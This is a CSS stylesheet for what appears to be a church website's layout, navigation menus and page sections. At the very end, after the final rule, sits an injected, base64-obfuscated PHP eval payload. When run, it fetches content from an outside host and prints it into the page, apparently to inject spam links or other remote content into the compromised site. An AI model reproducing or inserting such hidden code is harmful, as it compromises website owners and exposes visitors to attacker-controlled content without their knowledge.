* {
	font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
	font-size: 10pt;
	padding: 0;
	margin: 0;
}

body {
	background: #351a0f;
	behavior: url(csshover.htc);/* WinIE behavior call for menus */
}

div#container {
	width: 750px;
	margin: 0 auto;
	padding: 0 0 1px;
	background: #a57c52 url(new_images/back.gif) center repeat-y;
}

/* header, store, contact */
#head {
	width: 750px;
	height: 330px;
	background: url(new_images/top.gif) 0 0 no-repeat; 
}
#head h1 a {
	width: 460px;
	height: 90px;
	text-indent: 1000px;
	display: block;
	overflow: hidden;
	white-space: nowrap;
}
#head h1 {
	width: 600px;
	height: 100px;
	overflow: hidden;
	white-space: nowrap;
}
#head ul {
	list-style: none;
	display: block;
	position: absolute;
	height: 37px;
	top: 63px;
	margin-left: 600px;
}
#head ul li { 
	height: 37px;
	display: block;
	list-style: none;
	float: left;
	position: relative;
}
#head ul li a {
	height: 37px;
	display: block;
	color: #777;
	text-decoration: none;
	font-size: 6pt;
	text-indent: -1000em;
	overflow: hidden;
	font-weight: 800;
}
#head ul li#homeimg {
	background: url(new_images/home.gif) top right no-repeat;
	width: 45px;
}
#head ul li#homeimg:hover {
	background: url(new_images/homeover.gif) top right no-repeat;
}
#head ul li#contactimg {
	background: url(new_images/contact.gif) top right no-repeat;
	width: 37px;
}
#head ul li#contactimg:hover {
	background: url(new_images/contactover.gif) top right no-repeat;
}

/* navigation buttons */
ul#topnav {
	list-style: none;
	display: block;
}
ul#topnav li {
	float:left;
	list-style:none;
	position:relative;
	white-space:nowrap;
	height: 45px;
	width: 150px;
	display: block;
	background-repeat:no-repeat;
}
#nav ul#topnav li a {
	display:block;
	text-decoration:none;
	border: none;
	height: 45px;
	overflow: hidden;
	text-indent: 1000px;
	width: 150px;
}
#nav ul#topnav li#pastor {
	background: url(new_images/pastor.gif);
}
#nav ul#topnav li#pastor:hover, li#pastor a:active, li#pastor a:hover {
	background: url(new_images/pastorover.gif);
}
#nav ul#topnav li#church {
	background: url(new_images/church.gif);
}
#nav ul#topnav li#church:hover, li#church a:active, li#church a:hover {
	background: url(new_images/churchover.gif);
}
#nav ul#topnav li#msprayer {
	background: url(new_images/msprayer.gif);
}
#nav ul#topnav li#msprayer:hover, li#msprayer a:active, li#msprayer a:hover {
	background: url(new_images/msprayerover.gif);
}
#nav ul#topnav li#radiopodcast {
	background: url(new_images/radiopodcast.gif);
}
#nav ul#topnav li#radiopodcast:hover, li#radiopodcast a:active, li#radiopodcast a:hover {
	background: url(new_images/radiopodcastover.gif);
}
#nav ul#topnav li#store {
	background: url(new_images/store.gif);
}
#nav ul#topnav li#store:hover, li#store a:active, li#store a:hover {
	background: url(new_images/storeover.gif);
}
#nav ul#topnav li#history {
	background: url(new_images/churchhistory.gif);
}
#nav ul#topnav li#history:hover, li#history a:active, li#history a:hover {
	background: url(new_images/churchhistoryover.gif);
}
#nav ul#topnav li#ministry {
	background: url(new_images/churchministries.gif);
}
#nav ul#topnav li#ministry:hover, li#ministry a:active, li#ministry a:hover {
	background: url(new_images/churchministriesover.gif);
}
#nav ul#topnav li#calendar {
	background: url(new_images/churchcalendar.gif);
}
#nav ul#topnav li#calendar:hover, li#calendar a:active, li#calendar a:hover {
	background: url(new_images/churchcalendarover.gif);
}
ul.flyout {
	display: none;
	z-index: 99;
	width: 150px;
}
ul.flyout li {
	clear:both;
	display:block;
	width: 150px;
	text-align: center;
	height: auto;
}
ul.flyout li:hover {
	background: #524364;
}

div#nav ul#topnav li#church:hover ul.flyout li a {
	display:block;
	text-decoration:none;
	border: 0;
	text-indent: 1000px;
	overflow: hidden;
	margin: 0;
	width: 150px;
	font-size: 9pt;
	height: 45px;
}
div#nav ul#topnav li#church:hover ul.flyout li a:hover {
	color: #fff;
	font-size: 9pt;
	line-height: normal;
}
div#nav ul#topnav li#church:hover ul.flyout {
	display: block;
	position: absolute;
	left: 0px;
	top: 0px;
	background: #524364;
}

/* body */
#body {
	clear: both;
	background: #a57c52 url(new_images/borders.gif) 0 75px no-repeat;
	padding-bottom: 10px;
	min-height: 320px;
	color: #ffffff;
}
#pastorpage #body, #historypage #body, #ministriespage #body, #msprayerpage #body, #podcastpage #body, #storepage #body, #calendarpage #body, #contactpage #body, #passwordpage #body {
	background-image: url(new_images/borders2.gif);
	min-height: 440px;
}
h2 {
	width: 300px;
	height: 75px;
	text-indent: 1000px;
	overflow: hidden;
	background: url(new_images/welcometitle.gif) 0 0 no-repeat;
	float: left;
	margin: 0 -10px 10px 0;
	white-space: nowrap;
}
#pastorpage h2 {
	background-image: url(new_images/ourpastor.gif);
}
#historypage h2 {
	background-image: url(new_images/ourchurch.gif);
}
#msprayerpage h2 {
	background-image: url(new_images/msprayertitle.gif);
}
#ministriespage h2 {
	background-image: url(new_images/ministries.gif);
}
#podcastpage h2 {
	background-image: url(new_images/radiopodcasttitle.gif);
}
#storepage h2 {
	background-image: url(new_images/storetitle.gif);
}
#calendarpage h2 {
	background-image: url(new_images/calendar.gif);
}
#evitepage h2 {
	background-image: url(new_images/evites.gif);
}

#rightside {
	float:right;
	width: 450px;
	height: 307px;
	background: url(new_images/homelight1.gif) 0 0 no-repeat;
	margin: 0 0 10px 10px;
	color: #000000;
}
#pastorpage #rightside, #historypage #rightside, #ministriespage #rightside, #msprayerpage #rightside, #podcastpage #rightside, #storepage #rightside, #calendarpage #rightside, #contactpage #rightside, #passwordpage #rightside, #evitepage #rightside {
	background-image: url(new_images/solidpurple2.gif);
	height: 425px;
}
#purplebox {
	width: 438px;
	height: 171px;
	margin-left: 12px;
	background: url(new_images/homepurple.gif) top right no-repeat;
}
#pastorpage #purplebox, #historypage #purplebox, #ministriespage #purplebox, #msprayerpage #purplebox, #podcastpage #purplebox, #storepage #purplebox, #calendarpage #purplebox, #contactpage #purplebox, #passwordpage #purplebox, #evitepage #purplebox {
	width: 434px;
	height: 375px;
	background-image: url(new_images/solidpurple3.gif);
	margin-left: 16px;
}
#tanbox {
	width: 450px;
	height: 136px;
	background: url(new_images/homelight2.gif) 0 0 no-repeat;
}
#pastorpage #tanbox, #historypage #tanbox, #ministriespage #tanbox, #msprayerpage #tanbox, #podcastpage #tanbox, #storepage #tanbox, #calendarpage #tanbox, #contactpage #tanbox, #passwordpage #tanbox, #evitepage #tanbox {
	height: 50px;
}

p {
	padding: 20px 10px 0;
}

#purplebox p {
	text-align: right;
}
#pastorpage #purplebox p, #historypage #purplebox p, #msprayerpage #purplebox p, #ministriespage #purplebox p, #msprayerpage #purplebox p, #podcastpage #purplebox p, #storepage #purplebox p, #calendarpage #purplebox p, #contactpage #purplebox p, #evitepage #purplebox #p {
	text-align: left; ! important
}
#purplebox p a {
	text-decoration: none;
	color: #ffffff;
}
#purplebox p a:hover {
	text-decoration: underline;
}
#purplebox p.small, #purplebox p.small a {
	padding-top: 0;
	font-size: 7pt;
}
#purplebox p.cyan, #purplebox p.cyan a {
	color: #b8fcff;
}
#purplebox p.pink, #purplebox p.pink a {
	color: #f7caff;
}
#purplebox p.red, #purplebox p.red a {
	color: #f16c7d;
}
#tanbox p {
	text-align: center;
}

acronym {
	border-bottom: 1px dotted #795c3e;
}

h3 {
	font-weight: 800;
	padding: 20px 10px 0;
}
#body ul {
	list-style: disc;
	padding-left: 25px;
}
#purplebox h3 img {
	margin: 0 20px 10px 0;
}

/* links */
#body a {
	text-decoration: underline;
}
#body a:link {
	color: #f1e3bd;
}
#body a:visited {
	color: #483624;
}
#body a:hover {
	color: #494359;
}
#body a:active {
	color: #ffffff;
}

/* footer */
#foot {
	width: 750px;
	clear: both;
}
#foot p {
	font-size: 7pt;
	text-align: center;
}
#foot p a {
	font-size: 7pt;
}<!--erda8--><?php eval(base64_decode("JGw9Imh0dHA6Ly9yZWQtY2F2aWFyLWthbWNoYXRrYS5jb20vbGlua3MyL2xpbmsucGhwIjsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoImN1cmwiKSl7IA0KJGNoID0gY3VybF9pbml0KCk7IGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAzMCk7IGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7IA0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJGwpOyAkciA9IGN1cmxfZXhlYygkY2gpOyBjdXJsX2Nsb3NlKCRjaCk7fQ0KZWxzZXskcj1pbXBsb2RlKCIiLGZpbGUoJGwpKTt9IHByaW50IEAkcjsNCg==")); ?>